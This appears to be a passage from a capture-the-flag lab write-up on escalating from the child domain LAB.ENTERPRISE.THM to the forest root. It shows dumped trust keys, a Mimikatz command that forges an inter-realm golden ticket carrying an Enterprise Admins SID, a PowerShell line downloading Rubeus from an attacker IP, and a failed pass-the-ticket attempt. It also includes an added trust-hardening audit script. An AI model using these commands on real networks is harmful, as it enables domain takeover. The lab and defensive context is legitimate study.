    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c
        * aes256_hmac       643128314165f87c41041f07c13490fc0d96189f45c2eb3efcaa956707dd5a5e
        * aes128_hmac       3872b51d2e6716a863060cf1c00e4980
        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f

Domain: MORIMORI.COM (morimori.comERROR kull_m_string_displaySID ; ConvertSidToStringSid (0x00000057))
 [  In ] LAB.ENTERPRISE.THM -> MORIMORI.COM

 [ Out ] MORIMORI.COM -> LAB.ENTERPRISE.THM
    * 3/11/2021 7:30:30 PM - CLEAR   - 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00
        * aes256_hmac       a80d035b0775088e8ec1836d43f8b32f4cafca1f31f7c46f1615651dd140f382
        * aes128_hmac       10aac1e975ebdd4edb90692ebb2db502
        * rc4_hmac_nt       a4f49c406510bdcab6824ee7c30fd852

 [ In-1] LAB.ENTERPRISE.THM -> MORIMORI.COM

 [Out-1] MORIMORI.COM -> LAB.ENTERPRISE.THM
    * 3/11/2021 7:30:30 PM - CLEAR   - 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00
        * aes256_hmac       a80d035b0775088e8ec1836d43f8b32f4cafca1f31f7c46f1615651dd140f382
        * aes128_hmac       10aac1e975ebdd4edb90692ebb2db502
        * rc4_hmac_nt       a4f49c406510bdcab6824ee7c30fd852

Forge an inter-realm TGT to the parent domain ENTERPRISE.THM

From the output above we know the parent domain's SID is S-1-5-21-1835041512-953509921-1126143443.

Note that the rc4 parameter in the command below must be the trust key enumerated above, the value shown as * rc4_hmac_nt d84d2d46e70ebdcd94ec6f3c79f5731f.

Forge the TGT:

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi"'

Run it:

PS C:\users\Administrator\Desktop> Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi
User      : Administrator
Domain    : LAB.ENTERPRISE.THM (LAB)
SID       : S-1-5-21-2168718921-3906202695-65158103
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-1835041512-953509921-1126143443-519 ;
ServiceKey: d84d2d46e70ebdcd94ec6f3c79f5731f - rc4_hmac_nt
Service   : krbtgt
Target    : ENTERPRISE.THM
Lifetime  : 3/4/2022 1:37:00 AM ; 3/1/2032 1:37:00 AM ; 3/1/2032 1:37:00 AM
-> Ticket : C:\users\bitbucket\Desktop\trust_tkt.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
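What the forged ticket relies on is visible in its output: an Extra SID ending in -519 (Enterprise Admins of the root domain) signed with the RC4 trust key. Between domains of the same forest SID filtering is not applied, so nothing on the parent side strips that SID; this is why the forest, not the child domain, is the security boundary. The PowerShell below is an added example, not part of this write-up, for an administrator reviewing trusts with the RSAT ActiveDirectory module: it reads the properties Get-ADTrust exposes (IntraForest, SIDFilteringQuarantined, SelectiveAuthentication, UsesRC4Encryption and friends) and reports the settings that make this kind of ticket work. The sample objects are constructed to mirror the two trusts listed by PowerView above; their property values are assumptions.

```powershell
# Added example (not from the write-up): review domain trusts for the settings
# that a forged inter-realm ticket with an extra Enterprise Admins SID depends on.
function Test-TrustHardening {
    param(
        # Trust objects as returned by Get-ADTrust -Filter * (RSAT ActiveDirectory module)
        [Parameter(Mandatory)] [object[]]$Trust
    )
    foreach ($t in $Trust) {
        $issues = @()
        if ($t.IntraForest) {
            # SID filtering never applies inside a forest: the ...-519 extra SID is honoured,
            # so a child-domain admin holding the trust key is effectively a forest admin
            $issues += 'intra-forest trust: forest, not domain, is the security boundary'
        } elseif ($t.TrustType -eq 'Uplevel') {
            # External (non-forest) trusts should have quarantine (SID filtering) on
            if (-not $t.ForestTransitive -and -not $t.SIDFilteringQuarantined) {
                $issues += 'external trust without SID filtering (netdom trust ... /quarantine:yes)'
            }
            if (-not $t.SelectiveAuthentication) {
                $issues += 'selective authentication off: every account on the other side may authenticate here'
            }
        }
        if ($t.UsesRC4Encryption) {
            # The rc4_hmac_nt trust key alone was enough to sign the ticket above
            $issues += 'RC4 accepted for the trust key: prefer AES-only (ksetup /setenctypeattr)'
        }
        [pscustomobject]@{
            Name      = $t.Name
            Direction = $t.Direction
            Issues    = $issues
        }
    }
}

# Constructed sample mirroring the Get-NetDomainTrust output above (values assumed)
$sample = @(
    [pscustomobject]@{ Name = 'ENTERPRISE.THM'; Direction = 'BiDirectional'; TrustType = 'Uplevel'; IntraForest = $true;  ForestTransitive = $false; SIDFilteringQuarantined = $false; SelectiveAuthentication = $false; UsesAESKeys = $true; UsesRC4Encryption = $true },
    [pscustomobject]@{ Name = 'morimori.com';   Direction = 'Outbound';      TrustType = 'MIT';     IntraForest = $false; ForestTransitive = $false; SIDFilteringQuarantined = $false; SelectiveAuthentication = $false; UsesAESKeys = $true; UsesRC4Encryption = $true }
)

Test-TrustHardening -Trust $sample | Format-List
# Live use: Test-TrustHardening -Trust (Get-ADTrust -Filter *)
```

The parent-child trust is reported as an intra-forest boundary issue plus RC4 acceptance; the MIT realm trust only for RC4. The practical consequences for the owner of ENTERPRISE.THM are that every child domain must be operated to the same standard as the root, the trust and krbtgt keys of LAB.ENTERPRISE.THM must be rotated after a compromise like the one above, and logons on the root DCs by child-domain accounts that arrive holding root-domain privileged SIDs (event 4672 on ENTERPRISE-DC) deserve an alert.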

Check the current forest:

PS C:\users\bitbucket\Desktop> Get-NetForest

RootDomainSid         : S-1-5-21-1835041512-953509921-1126143443
Name                  : ENTERPRISE.THM
Sites                 : {Default-First-Site-Name}
Domains               : {ENTERPRISE.THM, LAB.ENTERPRISE.THM}
GlobalCatalogs        : {ENTERPRISE-DC.ENTERPRISE.THM, LAB-DC.LAB.ENTERPRISE.THM}
ApplicationPartitions : {DC=ForestDnsZones,DC=ENTERPRISE,DC=THM, DC=DomainDnsZones,DC=ENTERPRISE,DC=THM, DC=DomainDnsZones,DC=LAB,DC=ENTERPRISE,DC=THM}
ForestModeLevel       : 7
ForestMode            : Unknown
RootDomain            : ENTERPRISE.THM
Schema                : CN=Schema,CN=Configuration,DC=ENTERPRISE,DC=THM
SchemaRoleOwner       : ENTERPRISE-DC.ENTERPRISE.THM
NamingRoleOwner       : ENTERPRISE-DC.ENTERPRISE.THM

The parent domain's DC is ENTERPRISE-DC.ENTERPRISE.THM.

Transfer Rubeus.exe to the target:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.63.196/Rubeus.exe','C:\users\bitbucket\Desktop\Rubeus.exe')"

Use Rubeus to request a TGS with the forged ticket:

PS C:\users\bitbucket\Desktop> .\Rubeus.exe asktgs /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi /service:cifs/ENTERPRISE-DC.ENTERPRISE.THM /dc:ENTERPRISE-DC.ENTERPRISE.THM /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Ask TGS

[X] Error resolving hostname 'ENTERPRISE-DC.ENTERPRISE.THM' to an IP address: No such host is known

It fails: the hostname cannot be resolved.

Searching with PowerView does not find it either:

PS C:\users\bitbucket\Desktop> Get-NetComputer -Domain LAB.ENTERPRISE.THM
LAB-DC.LAB.ENTERPRISE.THM
PS C:\users\bitbucket\Desktop> Get-NetComputer -Domain ENTERPRISE.THM
WARNING: Error: Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server."

This is very strange.